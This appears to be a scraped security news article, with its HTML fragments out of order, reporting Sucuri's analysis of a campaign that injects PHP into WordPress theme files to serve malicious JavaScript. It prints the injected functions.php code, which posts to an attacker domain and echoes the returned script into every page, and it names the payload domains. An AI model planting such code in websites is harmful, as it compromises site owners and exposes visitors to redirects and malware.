WordPress websites have become a prime target for threat actors seeking to monetize traffic and compromise visitor security.<\/p>\n
In recent months, a new malvertising campaign<\/a> has emerged, leveraging silent PHP code injections within theme files to serve unwanted third-party scripts.<\/p>\n The attack blends seamlessly with legitimate site operations, delivering obfuscated<\/a> JavaScript that redirects visitors, displays pop-ups, and evades security tools without raising suspicion.<\/p>\n Initially discovered by a site owner noticing unexplained script loads, the intrusion originated from a small block of PHP code appended to the active theme\u2019s This injection did not alter visible page content, instead executing behind the scenes on every request.<\/p>\n Sucuri analysts identified<\/a> the campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by multiple security vendors.<\/p>\n The attack primarily exploits weak file permissions and outdated themes. By gaining write access\u2014often through compromised credentials or vulnerable plugins\u2014hackers insert a seemingly benign function that contacts a command-and-control server.<\/p>\n Once invoked via the Sucuri researchers noted that the injected function establishes a POST connection to a remote endpoint<\/a> at hxxps:\/\/brazilc[.]com\/ads.php, retrieves the malicious script, and embeds it directly into the HTML document.<\/p>\n The payload performs two main actions: loading a traffic-distribution script from These techniques enable forced redirects, pop-ups, and evasion of security scanners by disguising malicious activity as legitimate CDN operations.<\/p>\n The infection mechanism hinges on the following PHP function injected into Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.<\/p>\n The attacker\u2019s script then loads further malicious code asynchronously, leveraging attributes like By embedding within a hidden iframe, the malware<\/a> evades detection and resides persistently until the injected code is removed.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nfunctions.php<\/code> file.<\/p>\nwp_head<\/code> hook, the function fetches a dynamic JavaScript payload and echoes it into the page\u2019s <head><\/code> section, ensuring execution before the rest of the page loads.<\/p>\nporsasystem.com\/6m9x.js<\/code> and injecting a hidden 1\u00d71 pixel iframe that mimics Cloudflare\u2019s challenge platform.<\/p>\nInfection Mechanism<\/strong><\/h2>\n
functions.php<\/code>:-<\/p>\n\/\/ Injected PHP function in functions.php\nfunction ti_custom_javascript() {\n $response = wp_remote_post(\n 'https:\/\/brazilc.com\/ads.php',\n array('timeout' => 15, 'body' => array('url' => home_url()))\n );\n if (!is_wp_error($response)) {\n echo wp_remote_retrieve_body($response);\n }\n}\nadd_action('wp_head', 'ti_custom_javascript');<\/code><\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrKj7nw9Dwfj2_4YXGievJ5iDuQfRm7wFXYC4svOHtfKXLiH39_EYKBGJm0V-XDgPaRpV4fcbULkniHYDCDJFcOjJaRFswEbWeyvtfXCq01FRj85WzUrhPbYxQrDGFwv_2HaF-6UKGA-Z2iZS3Bg5fgO-JEmIc56aDvE3xqYFxcNvFqzIx4_LJDGzmKPA\/s16000\/Payload%2520%28Source%2520-%2520Sucuri%29.webp?ssl=1\")
data-cfasync='false'<\/code> and async<\/code> to bypass Cloudflare Rocket Loader.<\/p>\n